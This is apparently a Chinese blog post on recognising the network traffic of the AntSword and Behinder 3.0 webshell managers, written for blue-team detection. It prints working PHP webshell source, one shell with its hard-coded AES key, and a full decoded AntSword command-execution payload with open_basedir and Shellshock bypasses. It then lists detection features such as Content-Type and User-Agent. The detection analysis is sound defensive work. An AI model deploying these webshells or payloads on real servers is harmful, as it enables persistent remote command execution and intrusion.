常见流量分析——蚁剑、冰蝎3.0篇

前言

前段时间面试了某个蓝中，问了个流量辨别，但是准备的不太好，问了两个问题就被拿下了。因此这里简单学习分析一下常见的蚁剑和冰蝎3的流量特征。后面可能会补充其他的几个。

Antsword 蚁剑

测试方法

antsword代理设置为yakit的miit抓包端口：

shell内容

<?php class G40yQ75K { public function __construct($H8744){ @eval("/*Z#h*u@!hyP709104P*/".$H8744."/*Z#h*u@!hyP709104P*/"); }}new G40yQ75K($_REQUEST['123']);?>

default模式分析

正常执行命令：ls

请求包

POST /antsword.php HTTP/1.1
Host: 192.168.111.11:9290
Accept-Encoding: gzip, deflate
Content-Length: 4878
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0

123=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.8a12e6d5fb%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2294f5%22.%229c862%22%3Becho%20%40asenc(%24output)%3Becho%20%22213f8f%22.%2298dff6%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22qff008052217ff%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22f12d7548c56512%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22b832f5f8b2f391%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&b832f5f8b2f391=aY&f12d7548c56512=98Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gOGYzNTMzNztwd2Q7ZWNobyA1OGRhZTA%3D&qff008052217ff=nmL2Jpbi9zaA%3D%3D

POST传入的代码部分我们可以先提取出来：

<?php

@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.8a12e6d5fb";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        $tmdir = realpath($tmdir);
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
    return $out;
};
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "94f5" . "9c862";
    echo @asenc($output);
    echo "213f8f" . "98dff6";
}
ob_start();
try {
    $p = base64_decode(substr($_POST["qff008052217ff"], 2));
    $s = base64_decode(substr($_POST["f12d7548c56512"], 2));
    $envstr = @base64_decode(substr($_POST["b832f5f8b2f391"], 2));
    $d = dirname($_SERVER["SCRIPT_FILENAME"]);
    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";
    if (substr($d, 0, 1) == "/") {
        @putenv("PATH=" . getenv("PATH") . ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=" . getenv("PATH") . ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if (!empty($envstr)) {
        $envarr = explode("|||asline|||", $envstr);
        foreach ($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r = "{$p} {$c}";
    function fe($f)
    {
        $d = explode(",", @ini_get("disable_functions"));
        if (empty($d)) {
            $d = array();
        } else {
            $d = array_map('trim', array_map('strtolower', $d));
        }
        return (function_exists($f) && is_callable($f) && !in_array($f, $d));
    };
    function runshellshock($d, $c)
    {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("a@127.0.0.1", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    };
    function runcmd($c)
    {
        $ret = 0;
        $d = dirname($_SERVER["SCRIPT_FILENAME"]);
        if (fe('system')) {
            @system($c, $ret);
        } elseif (fe('passthru')) {
            @passthru($c, $ret);
        } elseif (fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif (fe('exec')) {
            @exec($c, $o, $ret);
            print(join("
", $o));
        } elseif (fe('popen')) {
            $fp = @popen($c, 'r');
            while (!@feof($fp)) {
                print(@fgets($fp, 2048));
            }
            @pclose($fp);
        } elseif (fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while (!@feof($io[1])) {
                print(@fgets($io[1], 2048));
            }
            while (!@feof($io[2])) {
                print(@fgets($io[2], 2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif (fe('antsystem')) {
            @antsystem($c);
        } elseif (runshellshock($d, $c)) {
            return $ret;
        } elseif (substr($d, 0, 1) != "/" && @class_exists("COM")) {
            $w = new COM('WScript.shell');
            $e = $w->exec($c);
            $so = $e->StdOut();
            $ret .= $so->ReadAll();
            $se = $e->StdErr();
            $ret .= $se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    };
    $ret = @runcmd($r . " 2>&1");
    print ($ret != 0) ? "ret={$ret}" : "";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();

主要传参截取代码：

$p = base64_decode(substr($_POST["qff008052217ff"], 2));
$s = base64_decode(substr($_POST["f12d7548c56512"], 2));
$envstr = @base64_decode(substr($_POST["b832f5f8b2f391"], 2));

从第二位开始对应内容，这里测试一下传入参数：

b832f5f8b2f391=aY&f12d7548c56512=98Y2QgIi92YXIvd3d3L2h0bWwiO2xzO2VjaG8gOGYzNTMzNztwd2Q7ZWNobyA1OGRhZTA=&qff008052217ff=nmL2Jpbi9zaA==

base64模式分析

请求包

POST /antsword.php HTTP/1.1
Host: 192.168.111.11:9290
Accept-Encoding: gzip, deflate
Content-Length: 1754
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0

123=%40eval(%40base64_decode(%24_POST%5B'kb9d1f833840ab'%5D))%3B&b414e120ef931b=A3L3Zhci93d3cv&kb9d1f833840ab=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLmJhOTgxZDYyODg2IjtAbWtkaXIoJHRtZGlyKTtpZighQGZpbGVfZXhpc3RzKCR0bWRpcikpe2NvbnRpbnVlO30kdG1kaXI9cmVhbHBhdGgoJHRtZGlyKTtAY2hkaXIoJHRtZGlyKTtAaW5pX3NldCgib3Blbl9iYXNlZGlyIiwgIi4uIik7JGNudGFycj1AcHJlZ19zcGxpdCgiL1xcXFx8XC8vIiwkdG1kaXIpO2ZvcigkaT0wOyRpPHNpemVvZigkY250YXJyKTskaSsrKXtAY2hkaXIoIi4uIik7fTtAaW5pX3NldCgib3Blbl9iYXNlZGlyIiwiLyIpO0BybWRpcigkdG1kaXIpO2JyZWFrO307fTs7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuIEBiYXNlNjRfZW5jb2RlKCRvdXQpO307ZnVuY3Rpb24gYXNvdXRwdXQoKXskb3V0cHV0PW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO2VjaG8gImNhOSIuImFkYjkiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjI5NyIuImM0MyI7fW9iX3N0YXJ0KCk7dHJ5eyREPWJhc2U2NF9kZWNvZGUoc3Vic3RyKCRfUE9TVFsiYjQxNGUxMjBlZjkzMWIiXSwyKSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iCSIuJFQuIgkiLkBmaWxlc2l6ZSgkUCkuIgkiLiRFLiIKIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7

首先就是有个base64解码，

将对应传参base64解码即可得到代码：

返回包的格式是前面一部分随机数，后面一部分随机数，中间为有效内容：
可以先不考虑后面的随机数，从前面逐个删除并base64解码爆破出内容：

import base64
import sys

# 假设的编码文本
encoded_text = "ca9adb9Li4vCTIwMjEtMTEtMzAgMDg6NDQ6NDgJNDA5NgkwNzU1Ci4vCTIwMjQtMDQtMDcgMDQ6MTc6MjMJNDA5NgkwNzU1Cmh0bWwvCTIwMjQtMDUtMjkgMDc6MTc6MTEJNDA5NgkwNzc3CmxvY2FsaG9zdC8JMjAyNC0wNC0wNyAwNDoxNzoyMwk0MDk2CTA3NTUK297c43"

# 假定最小的有效Base64编码长度为一定值，这里假设为16
min_valid_length = 16

# 尝试爆破，去除前后可能的随机文本
for i in range(len(encoded_text)):
    for j in range(len(encoded_text), 0, -1):
        if j - i > min_valid_length:
            try:
                # 尝试解码当前子串
                decoded_text = base64.b64decode(encoded_text[i:j]).decode()
                # 如果成功解码，打印结果
                print("成功解码:", decoded_text)
                sys.exit()
            except Exception as e:
                # 解码失败，继续尝试
                pass

特征分析

蚁剑明显的固有特征即为代码部分开头的@ini_set("display_errors", "0");@set_time_limit(0);部分

Behinder3.0 冰蝎3.0

shell内容

<?php @error_reporting(0);session_start();$key="202cb962ac59075b";$_SESSION['k']=$key;$f='file'.'_get'.'_contents';$p='|||||||||||'^chr(12).chr(20).chr(12).chr(70).chr(83).chr(83).chr(21).chr(18).chr(12).chr(9).chr(8);$Ht74n=$f($p);if(!extension_loaded('openssl')){ $t=preg_filter('/+/','','base+64+_+deco+de');$Ht74n=$t($Ht74n."");for($i=0;$i<strlen($Ht74n);$i++) { $new_key = $key[$i+1&15];$Ht74n[$i] = $Ht74n[$i] ^ $new_key;} }else{ $Ht74n=openssl_decrypt($Ht74n, "AES128", $key);}$arr=explode('|',$Ht74n);$func=$arr[0];$params=$arr[1];class G6H53OR4{ public function /*Z#��h*u@!h736H186wQ*/__invoke($p) {@eval("/*Z#��h*u@!h736H186wQ*/".$p."");}}@call_user_func/*Z#��h*u@!h736H186wQ*/(new G6H53OR4(),$params);?>

密码123

模式分析

我们需要先将上传木马中的key提取出来：202cb962ac59075b

特征分析

强特征 - application/octet-stream

在冰蝎3.0中我们直接查看发包函数sendPostRequest源代码：（net.rebeyond.behinder.utils.Utils）

能注意到其中有一个强特征就是Content-Type是application/octet-stream，application/octet-stream 是一个 MIME 类型，表示二进制数据流。它通常用于以下情况：

• 未知文件类型： 当服务器无法确定文件的具体类型时，会使用 application/octet-stream 作为默认类型。
• 二进制文件： 例如，压缩文件（zip、rar）、可执行文件（exe、jar）、图片文件（jpg、png）等。
• 下载文件： 当用户从服务器下载文件时，服务器会使用 application/octet-stream 来指示浏览器应该将文件保存到本地磁盘，而不是在浏览器中直接打开。

简单来说，application/octet-stream 就是告诉浏览器：”这是一个二进制数据流，你无法直接理解它，请把它保存到本地磁盘，或者使用合适的应用程序打开它。”
除非反编译修改源代码，否则不会修改这段特征。

弱特征 - User-Agent

弱特征，可以很容易就被修改，冰蝎3.0在net.rebeyond.behinder.core.Constatns中定义了Cookie常量：

每次会在其中选择一个使用：


因为我现在使用的版本已经被修改过UA，这里提供下未修改的UA：

冰蝎3.0流量特征分析（附特征） - FreeBuf网络安全行业门户

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.9.168 Version/11.50
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 QQBrowser/6.9.11079.201
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201

强特征 - Accept&Cache-Control

根据net.rebeyond.behinder.utils.Utils其中的sendPostRequestBinary函数中可以发现是使用HttpURLConnection实现交互。

这里我有一点不懂，为什么这里引用的是java.net下的HttpURLConnection但是网上的分析是sun.net.www.protocol.http下的HttpURLConnection。

Utils中也引用的是java.net下的。可能是我使用的这个版本是别人改装过的。因为这里的sendPostRequestBinary这个函数下的特征application/octet-stream就已经被删除了。这里按照网上的内容继续操作。
在sun.net.www.protocol.http.HttpURLConnection#writeRequests中我们能看到：



如果没有对Cache-Control、Pragma、Accept和User-Agent赋值，就会设置为默认：

Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/你的版本号
Accept: */*

这个是Java20的内容，而网上常见的内容，是Java8的格式：

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Cache-Control: no-cache
Pragma: no-cache
User-Agent: java/1.8

而冰蝎自己会设置UA，也就导致另外三个不会被设置。

而因为我这里运行的Java版本是11，也就导致Accept和前面的结果都不一样。

弱特征 - Content-length

冰蝎中请求会调用Utils.getData函数对请求的参数加密，对于一些密钥交互，获取信息等具有相同payload的特征。

缺点是这个可能不太准，因此作为弱特征。

后记

后面有机会把其他的几个补充补充。